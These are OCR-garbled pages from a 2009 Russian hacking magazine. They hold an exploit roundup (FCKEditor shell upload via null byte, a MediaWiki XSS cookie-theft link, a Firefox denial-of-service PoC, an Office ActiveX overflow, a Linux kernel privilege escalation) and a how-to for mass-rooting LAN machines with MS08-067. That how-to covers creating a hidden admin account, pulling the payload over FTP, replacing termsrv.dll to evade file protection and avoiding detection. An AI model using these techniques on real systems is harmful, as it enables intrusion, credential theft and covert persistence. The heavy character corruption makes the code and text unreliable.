сервере, исходя из переданного параметра $сиггеп1:РоШег. Как видно 
из функции ОеіСиггепіРоІсІегО, имя указываемой пользователем папки 
проверяется только на наличиеуязвимости сіігесіогуітаѵегзаі, но никакие 
на банальный пиІІ-ЬуІе. 



сіазз ІРВІоскРогт 
{ 

Іипскіоп ІРВІоскРогт ( $раг ) 

{ 

дІоЬаІ $ѵ^дКедиезк, $жД1зег, $мдВІоскАІ1оѵ\гзІІТЕс1ік ; 

// получаем значение ѵфВІоскАсІсІгезз из массива $_КЕ(ЮЕ8Т 
$СМз->ВІоскАс1с1гезз = $ѵ7дКе<диезк->декѴа1 ( 

1 ѴфВІоскАсІсІгезз 1 , $ѵ\тдВедцезк->декѴа1 ( ' ір 1 , $раг ) ); 
$СМз->ВІоскАс1с1гезз = зкгкг ( 

$СМз->ВІоскАс1с1гезз , ' ' ); 



» Ехріоід 



Для наглядного примера эксплуатации воспользуемся встроенным 
тестовым стендом РСКебіЬгдля загрузки файлов — ./ебког/РІетападег/ 
со п п есФ гз/и р Іоа сКезР Ы:т I. 

Итак, в списке «ВеІеШЬе Рііе Бріоасіегіо изе» выбираем РНР (ну, или 
любой другой понравившийся тебе коннектор], далее в форме «И ріоаб а 
пеѵѵкіе» выбирай свой шелл, сохраненный с расширением .М и, наконец, 
в поле«Сиггеп1: РоШег» вбивай что-то вроде «ту-еѵіІ-зЬеІІ.рбрУоОО». 
Теперь, после сабмита заполненной формы, скрипте радостью покажет 
адрествоего загруженного шелла в поле«ІІрІоасІесІ Рііе ИРІ_» (в моем 
случае это ./изегРІезАезТрбр]. 

Как видно из примера, фзРіІеРаіЬ для тоѵе_ирІоабеб_РІе(] становится 
равным имени директории ($з5егѵег0іг), настоящее же имя файла 
($зРіІеЫате] просто-напросто отбрасывается нулл-байтом. 



»ТагдеІ5:| 



РСКебТог <=2.6.4, а также все ѵѵеЬ стз, в которых используется этот 
ѴѴѴВІѴѴѴб-редактор. 



»5оІи1іоп 



Как всегда, наилучшим решением для закрытия уязвимости будетуста- 
новка последней версии скрипта с сайта производителя — ШрУ/ѵѵѵѵѵѵ. 
ІскебіІог.пеТ 

МЕЖСАЙТОВЫЙ СКРИПТИНГ В 
МЕОІАѴѴІКІ 



» Вгіел 



Да-да! В движке МебіаѴѴікі, который используется Великой и Ужасной 



//функция для отображения элементов кбші- страницы 
Іипсбіоп зЬоѵ7Рогш( $егг ) 

{ 

$изег = ІІзег: : пе^РгогШате ( $СМз->ВІоскАсіс1гезз ) у 

// отображаем полученное 
значение ѵфВІоскАббгезз в веб-форме 
Хті : : іприк ( 1 х^ВІоскАббгезз 1 , 45, 
$Ытіз->ВІоскАббгезз , аггау ( 

ВНЕШНИЙ ВИД РСКЕйІТОР 

РІеазе зеіесііііе затріе уои ѵгапііо ѵіеѵѵ: 

[РНР;Затр1еД1 ДгѵШІІваіигез ід| 

РСКесШог - РНР - Затріе 1 

ТЬіз затріе сіізріауз а погтаі НТМІЛогт Ш\ ап РСКесІіІогѵіІі ШІІ Теаіигез епаЫесІ. 

ішисгошаіноаіШііевііѵН- чаш0ів«ч»вй!-'0* 

|в і и ж|>> «>(ё в|$ ЯШ* ФІО ѲФб 

\ Стиль |Д Форматирование Нормальный т | Шрифт | [*] Размер | [ т | | ІД’ | Щ ^ | [?] 

ТИІ8 із зоте затріе іехі. Уои аге изіпд РСКѳДИог . 



ЗиЬтіі 




► 042 



ХАКЕР 08 /128/ 09 
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САІ.С.ЕХЕ, ВЫЗВАННЫЙ ПЕРЕПОЛНЕНИЕМ АСТІѴЕХ КОМПОНЕНТА В ІЕ 
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Ос ули Іспоѵ сЬі бибіііи еііеЬ? 

С Х<Ц>9? 

Шт:’* г1а№ ( МЛМ ія г.Ь# ймйНш лассЬ в? віі 1 

ШШШШТТТТ....(Іи уии Пиаг и? 

Ули Ьмг И 1 Ули <1л г.лл' Іг.'я пль }илг. л#' Тг.'я іг ' л I му' 
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КМг.'а г.Мх* Г*лш#сМпо ясігя ѵіг.Мп г.Ь* ьмаг.’а ЬМІу' Ялтг^г.мпа ипяхр# 
■.* • 



ДЕМОНСТРАЦИЯ РАБОТЫ ТУИ КЕКЫЕІ. ЭКСПЛОЙТА 



РЕМІАІ.0Р5ЕКѴІСЕВМ02ІІ.І.АРІКЕР0Х 




ПОВРЕЖДЕНИЕ ПАМЯТИ В М02ІЦ.А 
РІВЕРОХ 



' СаЪіпсіех ' => ' 1 ' , 

'ісР => ' пм-Ъі-Сагдек ' , 

' опсЬапде' => ' ирсІакеВІоскОркіопз ( ) ' ) ) . " 

</ѣб> 

</кг> 

<кг>" 

) ; 

} 

?> 

Переменная ѵѵрВІоскАсІсІгезз (а затем и $1; И і з ^ В Іос кАсІ сі гез5І нигде и ни- 
коим образом не фильтруется, та к что нам остается лишь грамотно заюзать 
этотзамечательный факт. 



» Ехріоід 



Использовать описанную уязвимость межсайтового скриптинга необы- 
чайно просто. Достаточно лишь скормить администратору или любому 
другому привилегированномуучастнику Вики-портала ссылку вида: 



» Вгіей 



Чем популярней становится софт, тем больше энтузиастов находят в нем 
уязвимости. Печальным примером служит не так давно вышедший РігеГох 
3.5, где некий ЗВеггу ака Зітоп Веггу-Вугпе нашел замечательную багу 
переполнения кучи, с помощью которой злоумышленникможетвыпол- 
нить произвольный код на целевой системе. 

Проблема заключается в ошибке в ЧизРіп-Тіте (ЛТ, компиляторе нового 
движка ЗаѵаЗсгірідля Огнелиса): при обработке ЗаѵаЗсгірЕом некоторых 
тегов НТМІ_ (например, Гопі) компилятор некорректно возвращает данные 
из собственныхфункций, таких какезсареП. 

Кстати, тем же автором, но в соавторстве с Апбгеѵѵ Наупез была найдена 
и еще одно переполнение (теперьуже вызывающее Оепіаі оГ Зегѵісе) в 
свежем файрфоксе — Могіііа РігеГох 3.5 Ипісобе Оаіа ГСетоІе 5іаск ВиЛег 
ОѵегГІоѵѵѴиІпегаЬіШу. На этот раз бага заключается в некорректной обра- 
ботке длинных ипісобе-последовательностей в методе ѵѵгіГе вышеозна- 
ченного движка 65. 



»ТагдеІз| 



РігеГох 3.5 и, возможно, более ранние версии. 



Ъ±Щр : / /зіке . сот/ іпсіех . ркр/8ресіа1 : Віоск/ РѵдэВІоскАсІсІге 
зз=" /><зсгірк>а1егк ( 1 Ргіѵек ! Уа МедаХЗЗ : ) ' ) с/зсгіркха 
ЬгеП= " 



»5оІиІіоп 



За всеми зесигііу-апдейтами для Огнелиса обращайся по адресу тоу На 

сотЛігеіох . 



Если это будет Х55 со ссылкой на твой снифер, то авторизационные куки- 
сы администратора благополучно окажутся утебя. 



»ТагдеІз| 



Уязвимы сразу две ветки МесІіаѴѴІкі: 
МесІіаѴѴІкі <= 1.14.0 
МесІіаѴѴІкі <= 1.15.0 



»5оІи(іоп 



Какобычно, незабываем проверять наличие свежей версии движка на 
сайте производителя — тебіаѵѵікі.ога/ѵѵікі/РоѵѵпІоаб . 



|» ЕхрІОІГ :| 



Для первого переполнения автор предоставляет нам в пользование 
неплохой РоС [ ЬГГрУ/тіІѵѵОгт.сот/ехрІоіГз/? 137 ). запускающий на твоей 
машине приложение саіс.ехе, а для второго достаточно лишь накидать 
небольшой Ы:тІ-пример с использованием іаѵазсгірЕ 

<ккт1> 

<Ьеас1> 

<зсгірк 1апдиаде=" ЦаѵаЗсгірС" Суре=»Техк/ ЦаѵазсгірС " > 
ѵаг зкг = ипезсаре ( " %и4141%и4141 " ) ; 
ѵаг зкг2 = ипезсаре ( " %и0000%и0000 " ) ; 
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Ф ѵѵр271 — Ѵізгі 5і1:е 



ІЙ ОйзЬЬоаіхі 



кеіагесі ѵѵ а у 7 (о такс дсііоп Ііа: Ьееп иргівЕегі! 



Ѵ^огСІРг055 2<Ѳ,1 і* аѵаІІаЫеі РІеаае иогіаЕе поѵѵ , 



РОЗІЗ 

Е<ІЛ 

АСІСІ Мен 

Та 0 5 

Сайдогіа? 
М*3іа 
^ ТлпІіЗ 
|Р Ра^вз 
ф С&ШНіепЕ5 



Кёіаіед. \Ѵау$ іо ТакеЛсііоп Шоіхіргезз Пидт 



Ексіигіе ас!іоп$ Ьу Еегтп 
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Кгегз 

Х55 В ПЛАГИНЕ ГСЕІ.АТЕО ѴѴАѴ5 ТО ТАКЕ АСТІОЫ 



ѵаг :Еіпа1зЦг2 =ши18(зТг2 , 49000000); 
ѵаг ІіпаІзСг = ти18 (зСг, 21000000) ; 
йоситепТ .ѵ^гіТе ( 1іпа1зТг2 ) ; 
сІоситепС .ѵлгіЕе ( ІіпаІзСг) ; 

ІипсСіоп ти18 (зСг, пит) { 

ѵаг і = МаСЪ.. сеіі (МаНЬ. Іод (пит) / МаСЪ.ЬЩ) , 
гез = зСг; 

Йо { 

гез += гез; 

} мЬІІе (0 < — і ) ; 

геСигп гез.з1ісе(0, зСг.ІепдЩі * пит) ; 

} 

</зсгірС> 

</Ъеасі> 

<Ьос1у> 

</Ъосіу> 

</Ъ.Ст1> 

<ЬСт1><ЬосІу >< /ЬосЗу >< /НШтІ > 

Не вызывающая подозрений функция ѵѵгіТеО должна, по идее, вывести на 
экран оченьдлинные последовательности ипісосіе-символов. Но вместо 
этого Еігеіох зависнет и станет кушать очень-очень много памяти (так что 
на своей машинетеститьсплойт крайне не рекомендую]. 

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В МІСП050РТ ОРРІСЕ ѴѴЕВ 
С0МР0ЫЕМТ55РВЕА05НЕЕТ АСТІѴЕХ 
КОМПОНЕНТЕ 



» Вгіеп 



Мелкомягкие с каждым днем все больше и больше нас радуют. На этот раз 
в полезрения попал сплойт под ослика ІЕ, основанный на уязвимости в 
МІСГ 050 ІТ ОЕЕісе ѴѴеЬ Сотропепіз ЗргеасІзЬееІ: АсбѵеХ. Сей славный АсбѵеХ 
компонент используется браузером Іпіегпеі Ехріогегдля отображения 
электронныхтаблиц Ехсеі. Сама бага, собственно, заключается в ошибке 
при проверке границ данных в методе тзОаІаЗоигсеОЬіесШ в этом 
компоненте (ОѴѴС 10 и 0ѴѴС1 1). При эксплуатации уязвимости (например, 
с помощью всем известного метода с ібгате] злоумышленниклегко может 
вызвать переполнение стека и выполнить произвольный код на целевой 
системе. Иными словами, еслиты используешь в качестве браузера ІЕ, 
а также на твоем компьютере присутствует небезызвестный М3 ОАісе.то 
твоя система подвержена опасности. 



|» ЕхрІоіІз| 



Сразутри вариации эксплойта подописанную багуты можешь найти по 
адресу бІІрУ/ѵѵѵѵѵѵ.зесигіМаЬ.ги/ѵи [пега ЬіІЩу/382430.рЬр . 

Также для успешной эксплуатации уязвимости в твоем браузере должен 
быть разрешен АсбѵеХ, в частности, объекты «ОѴѴСЮ.ЗргеасІзНееІ:» и 
«ОѴѴС 1 1 .ЗргеасІзЬееІ:». 



|»ТагдеІз| 



• МюгозоАОШсеХР Зегѵісе РаскЗ; 

• М ісгозобі ОАісе 2003 Зегѵісе РаскЗ; 

• МісгозоО: ОАісеХРѴѴеЬ Сотропепіз Зегѵісе РаскЗ; 

• Місгозоіі: ОАісе ѴѴеЬ Сот ропепіъ 2003 Зегѵісе РаскЗ; 

• МісгозоА ОАісе 2003 ѴѴеЬ Сотропепіз ЬгОзе 2007 М іеговой ОАісе зузіет 
Зегѵісе Раск 1 ; 

• МісгозоО: Іп1:егпе1;5есигі1:уапб Ассеіегабоп 5егѵег20045і:апбагб Ебібоп 
Зегѵісе РаскЗ; 

• МісгозоО: ІпІегпеіЗесигіІуапб Ассеіегабоп 5егѵег2004 Епіегргізе Ебібоп 
Зегѵісе РаскЗ; 

• МісгозоО: Іп1:егпе1;5есигі1:уапб Ассеіегабоп 5егѵег2006; 

• Іп1:егпе1;5есигі1:уапб Ассеіегабоп 5егѵег2006 Зиррогіабііііу Сірсіаіе; 

• МісгозоО: ІпІюгпеіЗесигкуапсІ АссеІегаЬоп5егѵег2006 Зегѵісе Раск 1 ; 

• МісгозоО: ОАісе Зтаіі Визіпезз Ассоипііпд 2006. 



»5оІиІіоп: 



Как всегда, МісгозоА неторопится исправлять свои грабли. В качестве 
временной меры для исправления уязвимости рекомендуется деактиви- 
ровать следующие СЕЗЮ: 

{ 0002 Е5 41-0000-0000 -С 000-000000000046} 

{ 0002 Е5 59-0000-0000 -С 000-000000000046} 

ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 

вядреі_шух 



» ВгіеЯ 



1 7 июля сего года известный эксперт по безопасности *І\Ііх-систем, автор 
модуля дгзесигКу Вгаб Зрепдіег опубликовал описание и РоС весьма 
необычного эксплойта под последние ядра І_іпих. 

Необычным является то, что при анализе исходного кода ядра Ыпихэту 
багу практически невозможно обнаружить невооруженным глазом. 

Итак, уязвимый код кроется в реализации пеіДип из-за ошибки разымено- 
вания нулевого указателя в функции Шп_сЬг_рооІ(] файла бгіѵегз/пеіАип.с: 
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Приносим свои извинения 

Ріге^ох столкнулся с неожиданной проблемой и аварийно завершил работу. Мы 
попытаемся восстановить ваши вкладки и окна при его перезапуске. 



X 



Чтобы помочь нам в выявлении и устранении этой проблемы, вы можете отправить нам 
сообщение об ошибке. 

□ (Сообщить о падении в МогДа, чтобы они могли это исправить) 

Подробное ти 



Добавить комментарий (комментарии публн 



]Г*мі 



Перезапустить Рге^ох | | Выйти из НгЫох | 



УМИРАЮЩИЙ ОГНЕЛИС 



зСгиск зоск *зк = кип->зк; 

// іпікіаіі ге зк мікЪ. кип->зк 



іі ( ! кип) 

геСигп РОЬЬЕКК; / / і к Сип із ШЬЬ геСигп еггог 

Объясню, что здесь происходит: сначала инициализируется некая 
переменная зк и устанавливается в значение, которое может быть 
равно нулю. Затем значение переменной проверяетсятаким образом, 
что, если оно равно нулю, возвращается ошибка. 

Ба га п роя в ится тол ько п осле компиляциии сходн и ка , та к ка к в процессе 
оптимизации этого кода компиляторувидит, чтозначение означенной 
переменнойуже давно присвоено и просто вырежет блоке іб(И:ип). 

Такое нехитрое злодеяние, проведенное компилятором, позволит нам 
прочитать и записать данные по адресу 0x00000000, который затем 
можно будетспокойно перенаправить в пространство пользователя. 



|» ЕхрІоіІз| 



Опубликованный Брэдом Спенглером эксплойт, а также все его 
комментарии кэтой знаменательной баге на английском языке ты 
можешь скачать по адресу ЫірТ/тіІѵѵОгпп.сопп/ехрІоТз/?! 91 . 



|»ТагдеІ5| 



Біпих кегпеі <= 2.6.30 (ядро должно быть собрано с опцией ОСС 
-МеІеІе-пиІІ-роіпІюг-сЬескз). 



»5оІи(іоп: 



Для исправления этой и другихуязвимостей ядра Линукса незабывай 
регулярно проверять ОІТ-репозиторий производителя: ЬЛрУ/діТ 
кегпеі.огд . -и- 




ИНТЕРНЕТ 



АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 

ТРПРЙПІІ ИНТЕРНЕТ 

I ІшЛьЧ*ІІІ1 ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 

* Подключение - в любом месте 
Москвы и Московской обл. 

* Срок подключения в Москве - 14 дней, 
в Московской обл. - от 14 до 30 дней. 

* Установка прямого московского телефонного номера 

• Многоканальные телефонные номера 

* ІР-телефония 

* Выделенные линии Интернет 

• Корпоративные частные сети (ѴРМ) 

* Хостинг, услуги сіаіа-центра 

Реклама 

РМ Телеком 

ѵтимтпі.ги е-таИ:іп(о ©гті.ги ( 455 ) 988^8212 
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Приглашаем специалистов, имеющих 
опыт работы в области телекоммуникаций 









АВТОСПЛОИТ 
КАК ОБРАЗ ЖИЗНИ 

МАССРУТИНГ В ЛОКАЛЬНОЙ СЕТИ 



Что делать, если хочется всего и сразу, да еще и не напрягаться при 
этом? Правильно, надо найти того, кто сделает все за тебя. Так 
и в хакпроме — не хочешь выполнять рутинную работу, используй 
средства автоматизации. Благо, есть Меіазріоіі, голова на плечах 
и немного фантазии. 



Как-то раз у меня возникла идея создать 
портативную версию метасплойта. Зачем? 

Ну, представь, что ты порутал какой-нибудь 
узел в локалке и захотелосьтебе окинуть 
пристальным взглядом всю сеть изнутри. Явно 
нужна помощь в виде всевозможных х-іюоі'г, 
которые надо установить, настроить и т.д. Они 
начнут следить и всячески гадить в системе. 

В общем, форменное палево, хотя все зависит 
от конкретных обстоятельств. Гораздо круче 
иметь портативные версии, которые можно 
настроить заранее и тупо скопировать на 
тачку. Если все правильно сделать, нигде они 
тебя не выдадут, а по окончании злостных 
действий их нужно будет просто удалить. 

МЕТАСПЛОЙТ — ХР 
— М508_0б7 — РВ_1ЛОРУЖ 

В джентльменском наборе пентестера мета- 
сплойтзанимает отнюдь не последнее место, 



позволяя быстро проверить машинки и, по 
возможности, их поломать. Конечно, не 0-бау, 
нотем не менее. В общем-то, если не брать 
в расчетустановку птар и, соответственно, 
ѵѵіпрсар, проблем с созданием портатив- 
ной сборки не было. Но тут я наткнулся на 
ЕазуНаск от5КѴ02 Нг за май 2009] — про 
реализацию массрутинга с помощью метас- 
плойта. Тема меня дико заинтересовала, и я 
решил ее развить. 

Честно сказать, с метасплойтом я до этого 
особенно и не работал. Так, баловался разными 
сплойтами, не дальше изег диісіе. Но идея мас- 
срутинга реально зацепила. Более того, у меня 
было стойкое ощущение, что после эпидемии 
сопЯскег найти тачки с юзабельной дыркой 
проблематично. Напомню, что 5КѴ02 предла- 
гал использовать связку птар и метасплойт 
как раз для массрутинга дыры М508_067. Ради 
интереса я повторил эксперимент в своей ло- 



калке и был приятно удивлен. Более четверти 
машин выбросили рутовые шеллы. 

Еще больше обрадовал тот факт, что сам 
эксплойт мог бы быть и другим. Только за 
2009 год МісгозоіЧ уже опубликовала порядка 
20 критическихуязвимостей. Одна из них — 
т з09-001 — также связана с 5МВ. Эксплойта 
под нее пока нет, но, возможно, это только 
вопрос времени. 

Однако не всетаксладко. Нарисовалось не- 
сколько проблем, которыетребовали решения. 
Допустим, у тебя есть шелл. Классика жанра 
требует создания нового пользователя и добав- 
ления его в локальную группу администраторов 
(или снятия хешей паролей, или просто замены 
пароля локального админа]. В российских 
реалиях подавляющее большинство машин 
в локалке (я говорю о клиентскихтачках под 
ѴѴіпХР] работают под л окал изованной осью, а, 
значит, локальная группа носит название «Ад- 



► 046 
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ІоэсЫ 335 ех***5, 217 рауЬэск, 20 епс«1ег5, 6 гх**, апгі 99 аихіагу 



ГЕРОЙ ДНЯ — МЕТАСПЛОЙТ С ЭКСПЛОЙТОМ М508_0б7 



министраторы». Попробуй вбить вудаленной 
консоли «Администраторы» и тебя накроет 
глубочайшее чувство обиды. Да-да, извечная 
проблема с кодировками. Консоль работает 
подср866, ѴѴіпбоѵѵз — под ср 1 251 , никсы и 
вовсе под Коі8-г или ІЭпісосІе. Метасплойтже 
и нагрузки, типа теіегргеіег, в принципе не 
понимают русскую локаль. Отсюда на ровном 
месте мы получаем нехилую проблему. 

В сетке эта тема достаточно широко обсужда- 
ется. В конечном итоге все ссылаются на один 
и тот же патч Агас.теІаБрІоіЕсотДіскеі/253 ]. Я 
накладывал патч, пробовал разные кодиров- 
ки, но ни черта не получилось. Может, полу- 
чится утебя, но меня эта проблема оконча- 
тельно добила, и я решил искать нормальное 
решение. 

СКАЖИ МНЕ, 

КАК ТЕБЯ ЗОВУТ 

Итак, встала задача добавления пользова- 
теля в локальную группу администраторов 
посредством полученной консоли в условиях 
невозможности использовать символы кирил- 
лицы. План действий таков: пишем скрипт, 
реализующий необходимый функционал, ка- 
ким-то образом заливаем его на подопытную 
тачку и исполняем. Скрипты я предпочитаю 
писать на АіАоІТ, так что открываем 5сіТе из 
поставки АиІоІТ и начинаем ваять. При этом 
хотелось бы сделать версию скрипта, неза- 
висящую отлокали, — то есть скрипт должен 
уметь автоматически определять название 
локальной группы администраторов. 

Известно, что системные группы в винде 
имеют предопределенные 51 0, в частности, 
5Ю группы администраторов имеетзначе- 
ние 5-1 -5-32-544. Для получения назва- 
ния по 5Ю предоставляется АРІ-функция 
І-ОокирАссоипШате, экспортируемая библи- 
отекой АбѵАРІ32.сІЦ. В автоит модуль 5е си гАу. 
аиЗ предоставляет соответствующую функ- 
цию-обертку _5еси гМ:у 1_оокирАссои пШате. 

Этой функцией мы и воспользуемся (смотри 
файл изег.аиЗ на ОѴО). 



Вызов Тгау5е1:51;а1:е с параметром 2 блокирует 
появление иконки АиІоІТ в трее. Далее опре- 
деляется имя группы администраторов, созда- 
ется пользователь и добавляется в эту группу. 
Последний вызов модифицирует реестр, 
чтобы пользователь отсутствовал в списке ин- 
терактивного входа ХР. Компилируем скрипт в 
ехе-файл и проверяем на виртуалке. Если все 
в порядке, двигаемся дальше. 

В качестве транспорта поначалу я думал ис- 
пользовать 5М В. Мы находимся в той же сетке, 
что и жертва, — такпочемубыне расшарить у 
себя папку и не подложитьтуда файлик изег. 
ехе? Не видя никаких проблем, я так и пос- 
тупил. Но монтирование папки судаленной 
системы ни в какую не получалось — видимо, 
после эксплуатации сервис начинал работать 
неправильно. Нуда ладно, в винде по умолча- 
нию встроен консольный клиент Ар. Я поднял 
на тачке Ар-сервер (портативный ЕіІеХіАа), на- 
строил анонимный вход, а на удаленной тачке 
в папке %1:етр% строка за строкой прописал 
Ар-скрипт для подключения к моему серваку 
и получения файла. Далее в консоли появился 
вызов Ар. ехе с ключом -б, и файл изег.ехе ока- 
зался на предназначенном ему месте. После 
запуска в системе появился пользователь с 
нужными правами. 

Таким образом, принципиально проблема 
решается несложно. Впрочем, чем дальше, 
тем больше хочется. Вбивать каждый раз 
РТР'шный скрипт, качать и запускать файл 
— идеологически крайне далеко от постав- 
ленной задачи автосплойтинга. Крометого, 



доступ из консоли в винде — совсем не та к 
круто как в никсах, большинство утил просто 
не будут работать без графики. Так что, будем 
шаманить в попытке открыть доступ к рабоче- 
му столу. Вариантов, в принципе, всего два. 
Это — расшаривание стола (типа Вабтіп, ѴІЧС 
и т.д.) и использование терминальных служб. 
Первый для клиентских машин — совсем и 
не вариант, ибо очень палится. С ВОР в ХР 
вообще тухло: при инициации удаленного 
подключения локальный пользователь будет 
выброшен из активной сессии. Ноне надо 
отчаиваться, выходесть. 

РАЗРУШИТЕЛИ ЛЕГЕНД 

Чем думают ребята из ВебтопсГа, я не знаю, 
но порой их решения поражают воображение. 
Если в серверных ОС мы имеем человеческий 
доступ по ВОР, то в клиентских — полная лажа. 
Удаленный доступ вХР не уживается с локаль- 
ным, и только один из пользователей может 
оставаться активным (в Ноте Ебіііоп, кстати, 
терминальной службы вообще нет]. Зачем это 
сделано — большая загадка, потому что вряд 
ли кто-то будеттолько из-за этого покупать 
серверную ось, а неудобств доставляет неме- 
ряно, особенно в нашем случае. 

В одном из бета-релизов ХРтакого огра- 
ничения не было, поэтому для его снятия 
достаточно подменить библиотеку Іегтзгѵ. б А 
и перезагрузиться. На словах просто, на деле 
— нет. В сети различных патчеров, как грязи, 
но все они работают, прямо скажем, хреново, 
да и то — только если их запускать из интер- 



Совет №2. Не можешь бегать 
по утрам - бегай вечером! 

Нужен стимул - переезжай в бандитский 
район и возвращайся домой только после 
того как стемнеет 
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Защита файлов Ѵ/іпс1ом5 



Файлы, нужные для правильной работы Ѵ/іпбот, были 
заменены неизвестными версиями. Для обеспечения 
стабильной работы системы Ѵ/іпбот необходимо 
восстановить оригинальные версии этих Файлов. 

Т еперь вставьте Ѵ/Ыоѵі>$ ХР Рго7е$$іопаІ Зегѵісе Раск 3 СО. 



X] 




Подробнее | Отмена 



ХРУПОРНО СОПРОТИВЛЯЕТСЯ ЗАМЕНЕ СИСТЕМНЫХ ФАЙЛОВ 



ПНТТР://ѴѴѴШ| 

I Г 



> Ііпкз 



При создания авто- 
сплойта не обойтись 
без метасплойта: 

теІазрІоіСогд . 




>буб 

На дискеты найдешь: 

• Исходные коды 
скрипта ЛпаІ.аиЗ. 

• «Правильную» 
версию библиотеки 
Тегтзгѵ.сіи. 

• Конечный бинарник 
в виде самораспако- 
вываемого архива. 

• Пропатченные 
исходники метас- 
плойта, а также сами 
патчи. 



активной сессии и иметь доступ к рабочему столу. Дело в 
том, что системные 611 охраняются системой ѴѴіпсІоѵѵз Рііе 
РгоТесТіоп. Если доступен установочный дистрибутив (с СО 
или по сети], файлы будут автоматически заменены на ори- 
гинальные. Если нет, будет выброшено предупреждение 
о недоступности диска и предложение вставить диск л ибо 
принять новый файл. И хотя название файла не пишется, 
надо быть полным дауном, чтобы ответить «Да», на что я, 
естественно, полагаться не буду. Один из методов обхода 
заключается в необходимости загрузки в безопасном 
режиме, но удаленно, к сожалению, этого не сделаешь. 
Поэтому все патчеры идут лесом, и мы будем ваять собст- 
венный, который подменял бы библиотеку из неинтерак- 
тивной сессии, да и еще как-то справлялся с защитой фай- 
лов. Первая часть тривиальна, а вот со второй сложнее. 
Надо отследить появление окна и эмулировать нажатия на 
нужные кнопки. Положим, коддля этого мы написали, но, 
запустив его из консоли теіазріоіі, мы дико обломаемся, 
так как, не имея доступа к рабочему столу, окно он, естест- 
венно, не поймает, и никакие сигналы послать не сможет. 
На выручку, какобычно, приходит планировщикзадач, 
позволяющий запускать проги в интерактивном режиме. 
Идея втом, чтобы поставить задачу эмуляции пользова- 
тельских действий на выполнение в интерактивном режи- 
ме. Далее — дождаться ее запуска и уже потом подменять 
нужные файлы. Смотри на 0Ѵ0 полный код скрипта под 
названием б па І.а иЗ, а я тем временем поясню, что к чему. 

Я весь функционал засунул в один файл, поэтому сначала 
проверяю, с какими аргументами запущен бинарник. Если 
присутствует ключ бзр, значит, будем ждать появления окна 
и щелкать по кнопкам. Определить идентификационные 
данные окна и кнопок можно с помощью АиЗІпію из сборки 
АиІоІТ. После этого я отправляю машину в перезагрузку, дав 
юзеру 2 минуты на сохранение результатов работы. 

Если ключ ^зр не задан, скрипт выполняет свою основ- 
ную задачу. Сначала инициализируются необходимые 
переменные и осуществляется работа по созданию нового 
администратора. Затем производятся телодвижения 
касательно реестра и нетшелла, цель которых — открытие 
доступа к ПОР. Дальше проверяется версия ОС и, если 
она неХР, работа скрипта прекращается. Если же на 
узле установлена ХР, с помощью вс поднимается сервис 
планировщика, и на выполнение ставится наш же скрипт, 



но с ключом бэр. Подождав, пока планировщикзапустит 
задачу, скрипт реализует подмену библиотеки. Для этого 
переименовывается текущая сі II (если запущена служба 
ТегтЗегѵісе, библиотека будетзаблокирована, и удалить 
ее не получится), а новая би копируется в %5узІетгооІ%\ 
5у5Іет32\0ЕЕСасЬе (чтобы невозможно было восстано- 
вить исходную версию из кэша], и, наконец, подменяется 
сама библиотека в %вув1:еппгоо1;%\5у5І:ет32. 

После сборки я упаковал собранный экзешник и библио- 
теку в само распаковывающийся архив. Архив настроил на 
распаковку в %1етр%, автоматическую перезапись всех 
файлов (кстати, не перезаписывает — доказано), и запуск 
%1:етр%\йпа1.ехе по окончании распаковки. Хочешь про- 
тестировать? Бери рвехес и запусти архив на удаленной 
машине. Через примернотри минуты подключайся по ПОР. 
У меня все получилось, так что двигаемся дальше. 

УЖАСНЫЙ 5МВ 

При всей своей простоте и удобстве использования 5МВ — 
жутко глючная штука. Ктомуже, из всехтехнологий, реали- 
зованных Місгозои, это наверное, одна из самых корявых (не 
считая осла). Тотже метасплойт несет в себе 14сплойтов для 
втЬ; неза горами и новыедырки. Нуа мы пока воспользуем- 
ся тв08_067, как наиболее свежей и, пока еще, достаточно 
пробивной. Проблема кроется в библиотеке пе1:арі32.сШ., а 
точнее, в функции ѵѵсвсаі; (по крайней мере.такее исполь- 
зовал сопбскег). Для удаленного доступа используется 
ВРС-вызов с ІІІІЮ4Ь324&:8-1 670-01 63-1 278-5а47Ь*6ее188, 
то есть — обращение к интерфейсу згѵзѵс. 

Чтобы не мучить пользователей локалки, было решено 
создать тестовый стенд. Я накатил образ винды на ѴтѴѴаге 
с обновлениями, вышедшими до октября 2008 года (тогда 
появился патч], немного его подстроил и клонировал в 
трех вариантах. Итак, получена локальная минисеть, на 
которой можно оттачивать мастерство автосплойта. 

Моим удивлению и досаде не было предела, когда попытка 
применить метасплойтовский тз08_067 окончилась 
неудачей! Та же история постигла и милвормовский 
вариант, причем последний выплюнул ошибку«Маке 
5МВ СоппесЕоп еггопбЗ (пеіѵѵогк раІЬ ѵѵаз поі ІоипсІ]». Я 
подумал, что виноват файер, отключил его и попробовал 
заново. Ситуация немного изменилась, но была далека от 
идеала. Метасплойт неправильно определил сервис пак 



► 048 



ХАКЕР 08 /128/ 09 





взлом 




» 



1 




" 


-4 |1|г»аЕ- -Ір1«ЧЛ 

■ I [пи|і| (ЬАт аірі-а-іи Ьгкі ша в4я г Ня а гцці 

'Я Г>>М*І Ч(4«*І МВР 1 ■.■!<< М-1" Т«р*а 

-к І--Я--Г Я-*-Е»а *>-♦- «Ріа- а-М^Фка* 

И : 4к[«К.ДОі !4«іш| 

■к Т'У рр4*т тЬ.1 ■ інір ЦП 

-Я и— « МРМПІНГ ФЕрІФІЯ 

-г Мій Я П і ♦ — ■ *г—п р*ПФ 




1ІИ ■ (ІШІ1 (ішіііХ ІЬаІІ 

■к- я Ш іініі ™ я еяп#и рлп 

-Я: Нк-Р-Е- -*р|-+Е 

-X Е--ЧЧ-Е К]РР*рі ІРРР4- а-М* ***** 

■II [гва*]»! Оьіу Еіріиі икр я!±Ь Шк» оран 

■Ш [ГВЧ*] ЕРаата *ар|и*а кила ш|Л >Мч рмата С^НГТ, 

-к [ааріа! ІЫр [V, мЯаДга чЯг.ааа она вика* Ы» а-яркя 

ті- 


Г 

№ 1 



РАСШИРЕННЫЕ ОПЦИИ 

ЦВ АІІТОРѴѴЫ 



— « Рі пдегргі пі; : ѴѴіпсІоѵѵзХР Эегѵісе Раск 2+ 

— ІапдіРиззіап», хотя у меня был 5РЗ. Чтобы 
понять, что это значит, я немного пошарил по 
исходникам. 

Как итог, если в зр возвращается строка со 
знаком «+», значит, сервис пактупо неудалось 
определить. Что ж, выбираем в качестве цели 
